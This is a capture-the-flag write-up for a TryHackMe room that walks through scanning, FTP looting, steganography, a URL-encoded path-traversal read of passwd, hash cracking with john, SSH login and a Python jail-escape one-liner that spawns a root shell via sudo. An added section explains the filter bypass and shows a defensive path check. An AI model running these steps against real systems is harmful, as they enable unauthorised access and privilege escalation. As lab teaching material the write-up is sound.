Tokyo Ghoul

Room Link: https://tryhackme.com/room/tokyoghoul666

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/21 - FTP

Kali

ftp $VICTIM
Username: ftp
cd need_Help?
mget Aogiri_tree.txt
cd Talk_with_me
mget *

Ghidra

Kali

ghidra

Kali

./need_to_talk 
> kamishiro

Kali

steghide extract -sf rize_and_kaneki.jpg 
Password: You_found_1t

cat yougotme.txt

CyberChef was able to identify that it was Morse code, and from there the next few steps were obvious.

Morse code -> Hex -> Base64

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM/d1r3c70ry_center/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

There was a filter, so to bypass it I URL-encoded most of the path to passwd.
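Why a filter like this fails, and what a fix looks like, as an added example that is not code from the room or from the original writeup. It assumes the filter inspects the raw, still-encoded parameter for `../`; the base directory, function names and sample values are hypothetical.

```python
import posixpath
from urllib.parse import unquote

BASE = "/srv/app/pages"  # hypothetical directory the include parameter is meant to stay in

# Constructed sample inputs (not taken from the room).
PLAIN = "../../../etc/passwd"
ENCODED = "%2E%2E%2F" * 3 + "etc%2Fpasswd"
DOUBLE = "%252E%252E%252F" * 3 + "etc%252Fpasswd"


def naive_filter(raw):
    """Weak check (assumed): look for '../' in the raw, still-encoded value."""
    return "../" not in raw


def naive_open_path(raw):
    """Path the weak handler ends up opening once the value is decoded and joined."""
    return posixpath.normpath(posixpath.join(BASE, unquote(raw)))


def safe_open_path(raw):
    """Decode fully, canonicalise, then require the result to stay under BASE."""
    value = raw
    for _ in range(5):  # bounded loop so double encoding is unwrapped too
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        return None  # still changing after 5 rounds: reject
    if "\x00" in value:
        return None
    # posixpath keeps this deterministic offline; on a real server use
    # os.path.realpath so symlinks are resolved before the containment check.
    candidate = posixpath.normpath(posixpath.join(BASE, value))
    if posixpath.commonpath([BASE, candidate]) != BASE:
        return None
    return candidate


if __name__ == "__main__":
    for sample in (PLAIN, ENCODED, DOUBLE, "about.php"):
        print(sample, naive_filter(sample), naive_open_path(sample), safe_open_path(sample))
```

The check that matters is the containment test on the canonical path; matching substrings in the raw request is what the encoding sidesteps.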

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt passwd 

TCP/22 - SSH

Kali

ssh kamishiro@$VICTIM
Password: password123

Victim

sudo -l

Victim

cat /home/kamishiro/jail.py
sudo /usr/bin/python3 /home/kamishiro/jail.py
>>>  __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
